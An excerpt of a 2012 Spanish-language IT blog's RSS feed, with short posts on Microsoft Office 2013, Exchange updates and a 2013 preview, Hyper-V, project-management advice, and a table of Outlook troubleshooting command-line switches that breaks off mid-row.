      <title>¡Microsoft Office 2013 ya está terminado!</title>
      <link>https://www.igalvan.es/posts/microsoft-office-2013-ya-esta-terminado/</link>
      <pubDate>Sun, 14 Oct 2012 10:41:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/microsoft-office-2013-ya-esta-terminado/</guid>
      <description><![CDATA[<p>Una buena noticia para todos los que usamos habitualmente la suite  ofimática de Microsoft, Office 2013 ya está terminado y ha alcanzado la  versión RTM. Esto significa que probablemente será publicado en el  primer cuarto de 2013, aunque algunos ya llevamos disfrutandolo gracias a  Technet.<br /><br />Enlace al artículo: <a href="http://blogs.office.com/b/office-news/archive/2012/10/11/office-reaches-rtm.aspx" target="_blank"><a href="http://blogs.office.com/b/office-news/archive/2012/10/11/office-reaches-rtm.aspx">http://blogs.office.com/b/office-news/archive/2012/10/11/office-reaches-rtm.aspx</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>WOWZAPP 2012: Hackaton global para Windows</title>
      <link>https://www.igalvan.es/posts/wowzapp-2012-hackaton-global-para/</link>
      <pubDate>Sun, 14 Oct 2012 10:39:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/wowzapp-2012-hackaton-global-para/</guid>
      <description><![CDATA[<p>Es una serie de ferias a nivel mundial que está preparando Microsoft  para promocionar el desarrollo de aplicaciones para Windows 8. Como  todos los eventos de este tipo que prepara Microsoft va a estar genial,  una buena cantidad de toda eventos (musica, presentaciones, comida,  etc.) unida a la oportunidad de aprender de los mejores desarrolladores y  expertos de Microsoft.<br /><br />Enlace: <a href="http://www.microsoft.com/student/en-us/wowzapp/default.aspx" target="_blank"><a href="http://www.microsoft.com/student/en-us/wowzapp/default.aspx">http://www.microsoft.com/student/en-us/wowzapp/default.aspx</a> </a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Gestionar Personas por Objetivos</title>
      <link>https://www.igalvan.es/posts/gestionar-personas-por-objetivos/</link>
      <pubDate>Sun, 14 Oct 2012 10:38:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/gestionar-personas-por-objetivos/</guid>
      <description><![CDATA[<p>Controlar a tu equipo de trabajo sin asfixiarlo es la clave para mejorar el rendimiento<br /><br />Enlace al artículo: <a href="http://jose-barato.blogspot.com.es/2012/10/gestionar-personas-por-objetivos.html" target="_blank"><a href="http://jose-barato.blogspot.com.es/2012/10/gestionar-personas-por-objetivos.html">http://jose-barato.blogspot.com.es/2012/10/gestionar-personas-por-objetivos.html</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>No digas que no tienes suficiente tiempo</title>
      <link>https://www.igalvan.es/posts/no-digas-que-no-tienes-suficiente-tiempo/</link>
      <pubDate>Sun, 14 Oct 2012 10:36:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/no-digas-que-no-tienes-suficiente-tiempo/</guid>
      <description><![CDATA[<blockquote class="tr_bq">"Don't say you don't have enough time. You have exactly the same number of hours per day that were given to Helen Keller, Pasteur, Michelangelo, Mother Teresa, Leonardo da Vinci, Thomas Jefferson, and Albert Einstein." - Jackson Brown</blockquote>Fuente:<i> <a href="http://herdingcats.typepad.com/my_weblog/2012/10/q.html?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed:%20typepad/HerdingCats%20(Herding%20Cats)#close=1" target="_blank">http://herdingcats.typepad.com/my_weblog/2012/10/q.html?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed:%20typepad/HerdingCats%20(Herding%20Cats)#close=1</a></i>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Medir el coste en tiempo asociado con el procesamiento de las GPO en Directorio Activo</title>
      <link>https://www.igalvan.es/posts/medir-el-coste-en-tiempo-asociado-con/</link>
      <pubDate>Sun, 14 Oct 2012 10:32:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/medir-el-coste-en-tiempo-asociado-con/</guid>
      <description><![CDATA[<p>El artículo trata los costes asociados con el despliegue de GPO y  muestra ejemplos de como los ajustes en una GPO reaccionan con otros  ajustes, GPO y configuraciones ILT.<br /><br />Enlace al artículo: <a href="http://www.windowsnetworking.com/articles_tutorials/Group-Policy-Processing-Benchmarks.html" target="_blank"><a href="http://www.windowsnetworking.com/articles_tutorials/Group-Policy-Processing-Benchmarks.html">http://www.windowsnetworking.com/articles_tutorials/Group-Policy-Processing-Benchmarks.html</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Scale Out para Hyper-V</title>
      <link>https://www.igalvan.es/posts/scale-out-para-hyper-v/</link>
      <pubDate>Sun, 14 Oct 2012 10:28:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/scale-out-para-hyper-v/</guid>
      <description><![CDATA[<p>Un mini-tutorial de Scale Out para Hyper-V sobre Windows Server 2012.<br /><br />Enlace al artículo: <a href="http://undercpd.blogspot.com.es/2012/09/scale-out-para-hyper-v_27.html"><a href="http://undercpd.blogspot.com.es/2012/09/scale-out-para-hyper-v_27.html">http://undercpd.blogspot.com.es/2012/09/scale-out-para-hyper-v_27.html</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>ONO y la no seguridad de sus redes</title>
      <link>https://www.igalvan.es/posts/ono-y-la-no-seguridad-de-sus-redes/</link>
      <pubDate>Sun, 14 Oct 2012 10:25:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/ono-y-la-no-seguridad-de-sus-redes/</guid>
      <description><![CDATA[<p>Este problema es recurrente desde hace ya mucho tiempo, no entiendo como a estas alturas no lo han solucionado.<br /><br />Enlace al artículo: <a href="http://feedproxy.google.com/~r/ElLadoDelMal/~3/SpmRu3HTaGM/ono-la-insegura-estructura-de-la-red-de.html" target="_blank"><a href="http://feedproxy.google.com/~r/ElLadoDelMal/~3/SpmRu3HTaGM/ono-la-insegura-estructura-de-la-red-de.html">http://feedproxy.google.com/~r/ElLadoDelMal/~3/SpmRu3HTaGM/ono-la-insegura-estructura-de-la-red-de.html</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Tener claro los objetivos del proyecto</title>
      <link>https://www.igalvan.es/posts/tener-claro-los-objetivos-del-proyecto/</link>
      <pubDate>Sun, 14 Oct 2012 10:23:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/tener-claro-los-objetivos-del-proyecto/</guid>
      <description><![CDATA[<p>Raro es el proyecto en el que las partes interesadas tienen claros los objetivos entonces ¿cómo los cumplimos?<br /><br /><span style="background-color: white; color: #444444; font-family: 'Helvetica Neue', HelveticaNeue, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px;">Enlace al artículo: <a href="http://www.danielecheverria.com/index.php/objetivos-claros-y-realistas/"><a href="http://www.danielecheverria.com/index.php/objetivos-claros-y-realistas/">http://www.danielecheverria.com/index.php/objetivos-claros-y-realistas/</a></a></span></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>El mejor espía de China, es .... ¡Apple!</title>
      <link>https://www.igalvan.es/posts/el-mejor-espia-de-china-es-apple/</link>
      <pubDate>Thu, 11 Oct 2012 07:11:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/el-mejor-espia-de-china-es-apple/</guid>
      <description><![CDATA[<p><span style="background-color: white; color: #444444; font-family: 'Helvetica Neue', HelveticaNeue, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px;">El uso de satélites comerciales realizar los mapas de las aplicaciones de Google, Nokia y ahora la propia <i>Apple </i>está poniendo de manifiesto que suponen un grave peligro para aquellas naciones que quieren guardar en secreto sus instalaciones militares. Se trata de un nuevo riesgo que hasta ahora no han sabido afrontar de una forma eficiente. La pregunta es, ¿deberían los gobiernos llegar a algún acuerdo para que este tipo de instalaciones sean ocultadas antes de publicar estas aplicaciones o por el contrario debe primar el derecho a la información frente a la Seguridad Nacional?</span><br /><span style="background-color: white; color: #444444; font-family: 'Helvetica Neue', HelveticaNeue, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px;"><br /></span><span style="background-color: white; color: #444444; font-family: 'Helvetica Neue', HelveticaNeue, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px;">Enlace al artículo (en inglés) </span><a href="http://news.cnet.com/8301-17938_105-57528736-1/apple-maps-outs-secret-military-site-irks-taiwan/" style="font-family: 'Helvetica Neue', HelveticaNeue, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px;" target="_blank"><a href="http://news.cnet.com/8301-17938_105-57528736-1/apple-maps-outs-secret-military-site-irks-taiwan/">http://news.cnet.com/8301-17938_105-57528736-1/apple-maps-outs-secret-military-site-irks-taiwan/</a></a><br /><span style="background-color: white; color: #444444; font-family: 'Helvetica Neue', HelveticaNeue, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px;"><br /></span><span style="background-color: white; color: #444444; font-family: 'Helvetica Neue', HelveticaNeue, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px;"><br /></span></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Cartel arquitectura Windows Server 2012 Hyper-V</title>
      <link>https://www.igalvan.es/posts/cartel-arquitectura-windows-server-2012/</link>
      <pubDate>Thu, 27 Sep 2012 19:15:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/cartel-arquitectura-windows-server-2012/</guid>
      <description><![CDATA[<p>En el siguiente enlace se pueden descargar el cartel de la arquitectura de Windows Server 2012 Hyper-V y dos documentos que detallan la arquitectura.<br /><br /><a href="http://www.microsoft.com/en-us/download/details.aspx?id=29189" target="_blank"><a href="http://www.microsoft.com/en-us/download/details.aspx?id=29189">http://www.microsoft.com/en-us/download/details.aspx?id=29189</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Minimizar el riesgo actuando sensatamente</title>
      <link>https://www.igalvan.es/posts/minimizar-el-riesgo-actuando/</link>
      <pubDate>Sun, 23 Sep 2012 09:44:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/minimizar-el-riesgo-actuando/</guid>
      <description><![CDATA[<div style="text-align: justify;">Me he encontrado con una entrada de Ty Kiisel en <i>gantthead.com</i> que habla sobre como muchas veces mitigar el riesgo pasa por aplicar un poco de sentido común.&nbsp;Básicamente&nbsp;comienza hablando de la terrible temporada de incendios que está asolando el oeste de los EE.UU. y como muchas veces estos incendios son provocados por personas que, aunque de forma involuntaria,&nbsp;actúan&nbsp;de forma irreflexiva y descuidada. Este es el <a href="http://www.gantthead.com/article.cfm?ID=274856&amp;authenticated=1">enlace al artículo original</a> (requiere registro).</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">El extracto más interesante de artículo son las tres sugerencias que da para minimizar el riesgo y que, para nuestra&nbsp;vergüenza, son seguramente los mismos consejos que nos daba nuestra madre cuando eramos pequeños.<br /><a name='more'></a></div><ul><li style="text-align: justify;"><b>Dos cabezas son mejores que una</b>. Una vez trabajé con un tipo que siempre compartió sus ideas sobre planes de proyectos futuros o cambios que&nbsp;podían&nbsp;afectar al equipo. A pesar de que siempre tenía&nbsp;la autoridad de tomar&nbsp;la última decisión (y no trataba de traspasar esa autoridad al grupo), sentía como si&nbsp;siempre&nbsp;hubiera sido una buena idea obtener una segunda opinión. "<i>Puedo tomar decisiones muy estúpidas si lo hago completamente por mi cuenta</i>", decía, "<i>pero tengo menos probabilidades de hacer algo realmente estúpido si discuto mis planes con los demás.</i>" Con los años, he llegado a darme cuenta de que tenía razón.</li><li style="text-align: justify;"><b>Pare, mire y escuche</b>. Una canción que aprendí cuando era niño comenzaba más o menos así: "<i>Para, mira y escucha. Tus ojos le dirán a tus pies cuando puedes cruzar la calle. En primer lugar detente. Después mira. Después escucha atentamente. Puedes hacer casi cualquier calle tan segura como tu patio trasero ..</i>.". Probablemente han pasado 40 años desde la última vez que oí esa canción, pero es un buen consejo. Con demasiada frecuencia, actuamos sin pensar. Estoy seguro que al cigarrillo lanzado casualmente se&nbsp;hizo&nbsp;sin pensarlo dos veces. Si alguien hubiera pensado en ello, probablemente no habrían arrojado una colilla encendida en la hierba seca. Si la gente se tomara el tiempo para detenerse, mirar y escuchar, me pregunto cuántos millones de dólares gastados&nbsp;en la lucha contra los incendios y el pago por la pérdida de bienes se podría evitar. Creo que lo mismo es aplicable para los proyectos en los que trabajamos.</li><li style="text-align: justify;"><b>No jugar a los dados con el dinero del alquiler</b>. No voy a Las Vegas muy a menudo, pero suelo lanzar un poco los dados o jugar unas cuantas manos de <i>blackjack</i>. Me he dado cuenta de que hay básicamente dos tipos de jugadores: los que juegan con lo que no pueden darse el lujo de perder esperando el premio gordo al final de la partida, y los que van con un poco de dinero (este termino es relativo en función de lo que signifique la cantidad de un "<i>pocos</i>" dólares para ti) y esperan pasar entretenidos un par de horas en la mesa. Tiendo a ser de estos&nbsp;últimos. Si no tienes para gastarlo, no hay absolutamente nada divertido en el juego. Tampoco creo que sea una buena idea de jugar con el éxito del proyecto. Dicho esto, no me opongo a tomar un riesgo calculado que tiene el potencial de ofrecer una gran recompensa - Simplemente no apostaría la granja.</li></ul><div style="text-align: justify;">Yo intento aplicar estos preceptos en mi trabajo diario, con mayor o menor éxito dependiendo de las circunstancias, porque aunque todos sabemos pensar, muchas veces es&nbsp;difícil&nbsp;aplicar la lógica y la&nbsp;sensatez&nbsp;cuando las decisiones dependen muchas veces de elementos y circunstancias externas que poco o nada tienen que ver con las necesidades del proyecto. Una reflexión, ¿vosotros qué&nbsp;pensáis?</div><br />]]></description>
      
    </item>
    
    
    
    <item>
      <title>Update Rollup 8 para Exchange Server 2007 Service Pack 3</title>
      <link>https://www.igalvan.es/posts/update-rollup-8-para-exchange-server_15/</link>
      <pubDate>Wed, 15 Aug 2012 11:19:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/update-rollup-8-para-exchange-server_15/</guid>
      <description><![CDATA[<p>Microsoft ha publicado <em>Update Rollup 8 para Microsoft Exchange Server 2007 Service Pack 3</em>. Esta actualización tiene fecha del 13 de agosto de 2012. El artículo del enlace que puesto más abajo describe la siguiente información acerca de este <em>update rollup</em>:<br /><ul><li>Los problemas que el <em>update rollup</em> corrige.</li><li>Cómo obtener el <em>update rollup</em>.</li><li>Los prerequisitos para instalar el <em>update rollup</em>.</li></ul>Revisa el <a href="http://support.microsoft.com/kb/2734323" target="_blank" title="KB 2734323">KB2734323</a> <em>Description of Update Rollup 8 for Exchange Server 2007 Service Pack 3</em> para más detalles.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Update Rollup 4 para Exchange Server 2010 Service Pack 2</title>
      <link>https://www.igalvan.es/posts/update-rollup-4-para-exchange-server_15/</link>
      <pubDate>Wed, 15 Aug 2012 10:39:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/update-rollup-4-para-exchange-server_15/</guid>
      <description><![CDATA[<p>Microsoft ha publicado Update Rollup 4 para Microsoft Exchange Server 2010 Service Pack 2 (SP2). Esta actualización tiene fecha del 13 de agosto de 2012. El artículo del enlace que puesto más abajo describe la siguiente información acerca de este <em>update rollup</em>:<br /><ul><li>Los problemas que el <em>update rollup</em> corrige.</li><li>Cómo obtener el <em>update rollup</em>.</li><li>Los prerequisitos para instalar el <em>update rollup</em>.</li></ul>Revisa el <a href="http://support.microsoft.com/kb/2706690" target="_blank" title="KB 2706690">KB2706690</a> <em>Description of Update Rollup 4 for Exchange Server 2010 Service Pack 2</em> para más detalles.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Nuevo bosque de Directorio Activo sobre Windows Server 2012 RC</title>
      <link>https://www.igalvan.es/posts/nuevo-bosque-de-directorio-activo-sobre_5/</link>
      <pubDate>Sun, 05 Aug 2012 20:03:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/nuevo-bosque-de-directorio-activo-sobre_5/</guid>
      <description><![CDATA[<p>En este artículo voy a realizar un pequeño laboratorio que muestre como generar un nuevo bosque de Directorio Activo sobre Windows Server 2012 Release Candidate.<br /><br /><a name='more'></a>Para esta ocasión he decidido probar una nueva forma de presentar un artículo. Me he decidido por el formato de videotutorial porque creo que puede presentar una mejor forma de mostar la información.<br /><br /><div class="separator" style="clear: both; text-align: center;"><object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/vDGGRTRE33Q/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/vDGGRTRE33Q?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" /><param name="bgcolor" value="#FFFFFF" /><param name="allowFullScreen" value="true" /><embed width="320" height="266"  src="http://www.youtube.com/v/vDGGRTRE33Q?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" type="application/x-shockwave-flash" allowfullscreen="true"></embed></object></div><br />Este es el primero que hago así que no seaís muy duros conmigo.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Primeras impresiones sobre Exchange 2013 preview</title>
      <link>https://www.igalvan.es/posts/primeras-impresiones-sobre-exchange_24/</link>
      <pubDate>Tue, 24 Jul 2012 22:07:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/primeras-impresiones-sobre-exchange_24/</guid>
      <description><![CDATA[<p>Aunque no llevo muchas horas probandolo, creo que ya puedo realizar mi pequeño resumen de lo que he visto hasta ahora. Empezaré por lo positivo: <a name='more'></a> <br/><ul><br/>	<li><strong>Simplicidad de despliegue</strong>. Tan solo existen dos roles, servidor de buzones (<em>Mailbox Server</em>) y cliente de acceso (<em>Client Access Server</em>). El rol de servidor de buzones se encarga de realizar todo el procesamiento de las acciones sobre el buzón mientras que el cliente de acceso se encarga solamente de la autentificación, redirección y servicio de caché.</li><br/>	<li><strong>Adios a RPC como protocolo de acceso</strong>. Toda la conectividad con <em>Outlook</em> se hace usando RPC sobre HTTPS, es decir, <em>Outlook Anywhere</em>. Esto hace que se rompan algunas de las restricciones propias de RPC y añade flexibilidad a la plataforma como por ejemplo tener un sitio central de servidores de acceso de cliente para toda la organización.</li><br/>	<li><strong>Un proceso por base de datos</strong>. El proceso <em>store.exe</em> de cada base de datos se ejecuta como un proceso independiente, es decir, el fallo de uno de los procesos solo afecta a una base de datos.</li><br/>	<li><em><strong>Data Loss Prevention</strong></em>. Se trata de una serie de reglas para la protección de la información de la organización mediante el uso de una serie de normas regulatorias estandar como PII o PCI, e incluso permite crear reglas propias personalizadas. Esta es una noticia muy buena para aquellos que necesitamos restringir el tipo de información que se mueve dentro del correo electrónico.</li><br/>	<li><strong>Integración total con <em>Lync</em> y <em>Sharepoint</em> 2013</strong>. Prácticamente es uno con <em>Lync</em>, impresionante. Respecto a <em>Sharepoint</em> la creación de los <em>site mailboxes</em> es todo un acierto. Ahora puedes acceder a los correos y a  los documentos de la organización desde una misma interfaz. Cuidado, no lo confundas con los ficheros adjuntos en un correo, no son lo mismo.</li><br/>	<li><em><strong>Outlook Web App</strong></em>. La interfaz <em>Metro</em> en todo su explendor. Mucho más rápido, tan completo que parece que han trasladado <em>Outlook</em> 2013 a la <em>web</em>. Y muy importante, por fin se pueden crear tareas desde OWA.</li><br/></ul><br/><a href="http://igalvit.es/wp-content/uploads/2012/07/2012-07-24_21h00_46.png"><img class="wp-image-414 aligncenter" title="Outlook Web App" src="http://igalvit.es/wp-content/uploads/2012/07/2012-07-24_21h00_46.png" alt="Outlook Web App" width="472" height="357" /></a><strong></strong><br/><ul><br/>	<li><strong>Adios a EMC</strong>. Ahora solo hay EMS puro y duro, es decir, <em>PowerShell</em> y consola de texto para todos. Bueno, esto no es cierto del todo han creado una interfaz web llamada <em>Exchange Administrator Center </em>que sustituye al EMC y el ECP, pero después de probarla durante un rato, me quedo con EMS.</li><br/></ul><br/><a href="http://igalvit.es/wp-content/uploads/2012/07/2012-07-24_20h54_07.png"><img class="aligncenter  wp-image-413" title="Exchange Administrator Center" src="http://igalvit.es/wp-content/uploads/2012/07/2012-07-24_20h54_07.png" alt="Exchange Administrator Center" width="474" height="358" /></a><strong></strong><br/><ul><br/>	<li><strong>Mejoras en todas las áreas</strong>. Sería muy largo contar todas las mejoras que incluye. Mejoras en la replicación, en el soporte <em>ActiveSync</em>, mensajería unificada, etc. Si tienes ganas de revisarlas todas, sigue este <a title="Novedades Exchange 2013 preview" href="http://technet.microsoft.com/en-us/library/jj150540(v=exchg.150)#BKMK_eac" target="_blank">enlace</a>.</li><br/></ul><br/>Ahora lo que no me gusta:<br/><ul><br/>	<li><strong>Carpetas públicas</strong>. Socorro, pensé que me iba a librar de ellas, pero <em>Microsoft</em> las vuelve a rescatar.</li><br/>	<li><strong>Requisitos hardware</strong>. <em>Exchange 2013 Preview</em> es pesado, muy pesado. He tenido que generar una máquina virtual con 2 vCPU y 6 GB para que vaya ligero. Espero que esto mejore en la RTM.</li><br/></ul><br/>Y ahora me despido que tengo que seguir probando esta pequeña maravilla.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Las cuatro dimensiones del trabajo relacional</title>
      <link>https://www.igalvan.es/posts/las-cuatro-dimensiones-del-trabajo_15/</link>
      <pubDate>Sun, 15 Apr 2012 22:31:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/las-cuatro-dimensiones-del-trabajo_15/</guid>
      <description><![CDATA[<p>La idea de las cuatro dimensiones del equipo de trabajo puede ayudar a combinar las aptitudes y capacidades naturales de los miembros de un equipo con tareas o proyectos específicos<br /><a name='more'></a><br />Haciendo un poco de historia, hay que indicar que este método fue presentado por Timothy Butler y James Waldroop en junio de 2004 en la revista <em>Harvard Business Review</em> (HBR). Según lo que indican ambos, el sentido común interpersonal es crítico en casi cualquier área de negocio. En base a esta afirmación se puede decir que las cuatro dimensiones del trabajo relacional son:<br /><ul><li><strong>Influencia</strong>. Se trata de gente que disfruta siendo capaz de influir en otros, son buenos negociando y persuadiendo y les encanta disponer de ideas y conocimiento que compartir. Destacan por su habilidad para crear conexiones y relaciones estratégicas. A pesar de la creencia popular no siempre se trata de buenos comerciales, sino que muchas veces encajan más como los que levantan el estado de animo a sus compañeros o consiguiendo concesiones por parte del cliente como tiempo extra para completar una tarea.</li><li><strong>Facilitación interpersonal</strong>. Se trata de gente que está muy en sintonía con las experiencias de otras personas y suelen trabajar entre bambalinas haciendo que los demás se mantengan centrados en los proyectos para que se ejecuten de forma fluida. Son, además, capaces de ayudar a sus compañeros con los conflictos que puedan surgir dentro del grupo. Normalmente en esta dimensión encajan los gestores de Recursos Humanos.</li><li><strong>Creatividad relacional</strong>. Se trata de gente que puede generar conexiones con otras personas a través de imágenes visuales y verbales. Hay que tener en cuenta que estas conexiones se generan en la distancia y no en el cara a cara. En esta dimensión encajan personas que son capaces de motivar a través de un discurso escrito, un anuncio publicitario, etcétera.</li><li><strong>Liderazgo de equipo</strong>. Hay gente que ve a otra gente y quiere interactuar con ella. Mediante esta interacción, prosperan a través de estas otras personas para conseguir metas, pero hay que tener en cuenta que están más interesados en las personas y los procesos necesarios para alcanzar la meta que en la propia meta. Les gusta gestionar y trabajar en equipos energéticos en ambientes febriles de servicio. En esta dimensión es típico encajar a gestores de programa y gestores de unidades de entrega de servicios directos.</li></ul>Hay que tener en cuenta en estas dimensiones no son conjuntos discretos, por lo que una persona puede encajar perfectamente en varias dimensiones. Otro aspecto a tener en cuenta es que una persona que exclusivamente encaje muy bien en una dimensión puede no ser la persona más adecuada para una tarea en concreto al carecer de capacidades en el resto de dimensiones, como siempre el equilibrio es lo mejor.<br />Para finalizar indicados que como gestores senior de proyecto, debéis estar atentos al trabajo relacional, una estrategia de negocio es tan buena como la gente y equipos que la llevan a cabo, y esto debe ser recompensado, y no siempre con dinero.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Actualización de Exchange 2010 a SP2 RU1</title>
      <link>https://www.igalvan.es/posts/actualizacion-de-exchange-2010-sp2-ru1_14/</link>
      <pubDate>Sat, 14 Apr 2012 22:34:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/actualizacion-de-exchange-2010-sp2-ru1_14/</guid>
      <description><![CDATA[<p>Más que artículo, este texto es un consejo. Si vas a actualizar una instalación de Exchange 2010 a SP2 RU1, lee antes de nada las notas de lanzamiento. Como recomendación adicional, y quizás la más importante, presta mucha atención a la parte donde se habla de las politicas de ejecución, no vaya a ser que termines teniendo que utilizar el modo de restauración.<br />En este enlace se encuentran las notas de lanzamiento de la actualización <a href="http://technet.microsoft.com/en-us/library/hh529928.aspx" target="_blank"><a href="http://technet.microsoft.com/en-us/library/hh529928.aspx">http://technet.microsoft.com/en-us/library/hh529928.aspx</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Modificadores utiles de Outlook para resolución de problemas</title>
      <link>https://www.igalvan.es/posts/modificadores-utiles-de-outlook-para_14/</link>
      <pubDate>Sat, 14 Apr 2012 10:45:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/modificadores-utiles-de-outlook-para_14/</guid>
      <description><![CDATA[<p>A lo largo de los años nos hemos encontrado con muchos extraños problemas con <em>Outlook</em> por parte de usuarios finales. Estos problemas varían, pero el enfoque más común para algunos de estos problemas es usar los modificadores básicos de <em>Outlook</em> que quiero publicar una vez más y esperando que esto pueda proveer una guía de ejemplos para ti.<br /><a name='more'></a><br /><h2>Pasos básicos de resolución de problemas de <em>Outlook</em></h2><ul><li>¿El problema es global?¿Afecta a otros usuarios o a un único usuario?</li><li>Utiliza los modificadores listado más abajo.</li><li>¿Puedes abrir los perfiles de <em>Outlook</em> de los usuarios con problemas desde otro equipo para eliminar problemas específicos de equipo?</li><li>¿Puedes reproducir los mismos problemas desde OWA en vez de desde <em>Outlook</em>?</li><li>¿Problemas de cortafuegos o <em>software</em> antivirus en el equipo local?</li><li>¿Añadidos de terceros en el equipo con problemas?</li><li>¿Create un perfil adicional en el equipo con problemas y verificaste si el problema persistía?</li></ul><br /><h2>Los modificadores más comunes para <em>Outlook</em></h2>Los modificadores más comunes son los siguientes:<br /><ul><li><em>Outlook /CleanFreeeBusy</em>.</li><li><em>Outlook /ResetFolders</em>.</li><li><em>Outlook /CleanViews</em>.</li><li><em>Outlook /CleanReminders</em>.</li></ul><h2>Un buen recurso: <em>Outlook Configurator Analyzer</em></h2><em>Outlook Configurator Analyzer</em> proporciona un método rápido y sencillo para analizar el perfil de Microsoft Office Outlook para configuraciones comunes que pueden causar problemas en <em>Outlook</em>.<br /><br />Os dejo el enlace para su descarga <a href="http://www.microsoft.com/download/en/details.aspx?id=28806&amp;WT.mc_id=rss_office_allproducts" target="_blank">aquí</a>.<br /><h2>Listado de modificadores útiles para solucionar problemas de <em>Outlook</em></h2>Del listado total de modificadores os dejo un listado de los que resultan útiles para las tareas de resolución de problemas con <em>Outlook</em>.<br /><br /><table border="0" cellpadding="0" cellspacing="0" style="width: 826px;"><colgroup> <col width="191"></col> <col width="500"></col> <col width="135"></col> </colgroup><tbody><tr><td height="20" width="191"><strong>Modificador</strong></td><td width="500"><strong>Descripción</strong></td><td width="135"><strong>Exclusivo</strong></td></tr><tr><td height="40">/checkclient</td><td width="500">Pregunta al usuario cuál el administrador predeterminado de correo electrónico, noticias y contactos.</td><td></td></tr><tr><td height="40">/cleancategories</td><td width="500">Elimina los nombres de categorías personalizadas que haya creado. Restaura los nombres predeterminados de las categorías.</td><td>Outlook 2007, 2010</td></tr><tr><td height="20">/cleanclientrules</td><td width="500">Inicia Outlook y elimina las reglas basadas en el cliente.</td><td></td></tr><tr><td height="40">/cleandmrecords</td><td width="500">Elimina los registros de inicio de sesión guardados cuando un administrador o un delegado rechaza una reunión.</td><td></td></tr><tr><td height="40">/cleanfinders</td><td width="500">Quita las carpetas de búsqueda del almacén del servidor de Microsoft Exchange.</td><td></td></tr><tr><td height="40">/cleanfreebusy</td><td width="500">Borra y vuelve a crear la información de disponibilidad. Este modificador sólo puede utilizarse cuando se puede conectar al servidor de Microsoft Exchange.</td><td></td></tr><tr><td height="40">/cleanprofile</td><td width="500">Quita las claves de perfiles no válidos y vuelve a crear las claves de registro predeterminadas, si procede.</td><td></td></tr><tr><td height="120">/cleanpst</td><td width="500">Inicia Outlook con un archivo de carpetas personales (.pst) (Archivo de carpetas personales (.pst): archivo de datos que almacena sus mensajes y otros elementos en su equipo. Puede asignar un archivo .pst para que sea el lugar de entrega predeterminado de los mensajes de correo electrónico. Puede utilizar un archivo .pst para organizar y hacer una copia de seguridad de los elementos.) limpio.</td><td></td></tr><tr><td height="100">/cleanroamedprefs</td><td width="500">Todas las preferencias previas desplazadas se eliminan y se copian de nuevo a partir de la configuración local del equipo en el que se usa este modificador. Ello incluye los ajustes de uso móvil para avisos, la cuadrícula de disponibilidad, la jornada laboral, la publicación de calendarios y las reglas de RSS.</td><td>Outlook 2007, 2010</td></tr><tr><td height="20">/cleanreminders</td><td width="500">Borra y vuelve a crear los avisos.</td><td></td></tr><tr><td height="20">/cleanrules</td><td width="500">Inicia Outlook y elimina las reglas basadas en el cliente y en el servidor.</td><td></td></tr><tr><td height="60">/cleanschedplus</td><td width="500">Elimina todos los datos de Schedule+ (disponibilidad, permisos y el archivo .cal) del servidor y permite que todos los usuarios de Schedule+ 1.0 puedan ver y utilizar la información de disponibilidad del Calendario de Outlook.</td><td></td></tr><tr><td height="20">/cleanserverrules</td><td width="500">Inicia Outlook y elimina las reglas basadas en el servidor.</td><td></td></tr><tr><td height="80">/cleansharing</td><td width="500">Elimina todas las suscripciones a RSS, Calendarios de Internet y SharePoint de la configuración de cuenta, pero deja en el equipo todo el contenido descargado previamente. Esto es útil si no se puede eliminar alguna de dichas suscripciones en Office Outlook 2007.</td><td>Outlook 2007, 2010</td></tr><tr><td height="20">/cleansniff</td><td width="500">Elimina los mensaje de aviso 